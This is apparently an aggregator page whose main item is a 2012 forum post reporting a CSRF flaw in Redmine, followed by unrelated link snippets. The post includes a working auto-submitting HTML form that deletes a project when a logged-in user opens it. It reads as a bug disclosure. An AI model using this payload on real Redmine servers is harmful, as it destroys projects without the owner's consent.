29 Feb '12, 4pm

#OWASP Redmine is still vulnerable against CSRF

It seems that Redmine is still vulnerable against CSRF.

Scenario:
- user is logged in at the redmine server
- user follows a link that executes the following HTML code
- the project "deleteme" will be deleted automatically and the user will be logged out.

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>CSRF Demonstration</title>
    </head>
    <body onload="javascript:fireForms()">
    <script language="JavaScript">
    function fireForms() {
      document.forms[0].submit();
    }
    </script>
    <H2>CSRF Demonstration</H2>
    <form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme">
      <input type="hidden" name="_method" value="delete"/>
      <input type="hidden" name="confirm" value="1"/>
      <input type="hidden" name="commit" value="Delete"/>
    </form>
    </body>
    </html>

I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447? I'm using ...

Full article: http://www.redmine.org/boards/1/topics/29215%3Fr%3D29246

Tweets

Is Math Still Relevant?

spectrum.ieee.org 01 Mar '12, 6pm

Long ago, when I was a freshman in ­engineering school, there was a required course in mechanical drawing. “You had better...

@Froggycia Btw, if you're still interested:

indiesin.com 02 Mar '12, 5am


que

guides.rubyonrails.org 04 Mar '12, 8pm

The attacker creates a valid session id: He loads the login page of the web application where he wants to fix the session,...

Not all of us are still blind, are we? - by May...

blog.limkitsiang.com 01 Mar '12, 5pm

— May Chee Chook Ying The Malaysian Insider Mar 01, 2012 MARCH 1 — Not too long ago in a land not so far-away, in the king...

Looks like a nice theme / “ThemeRedAndy - Redmine”


redmine.org 29 Feb '12, 1am

Download the theme from Andriy Lesyuk website . Copy theme files (images and stylesheets directories) into public/themes/r...

still in 1 Peace: Al Linke's tiny breathalyzer ...

designnews.com 03 Mar '12, 10pm

As the cost of light-emitting diodes (LEDs) plummets, use of the devices is soaring in automotive applications. Automakers...

NASA's Project Morpheus Still Shooting for the Moon


spectrum.ieee.org 29 Feb '12, 12pm

Project Morpheus used to be called Project M , and it was an ambitious plan to send a Robonaut to the moon in under 1,000 ...

Redmine - Howto install Redmine on Heroku - Red...

redmine.org 10 Mar '12, 2am

Today I tried to install Redmine on Heroku. I handled the session store with no problem. When I tried to create the databa...

Feature #779 "Multiple SCM per project" was also closed without trouble. ...

redmine.org 27 Feb '12, 8am

Defect #2719 : Increase username length limit from 30 to 60 Defect #3087 : Revision referring to issues across all project...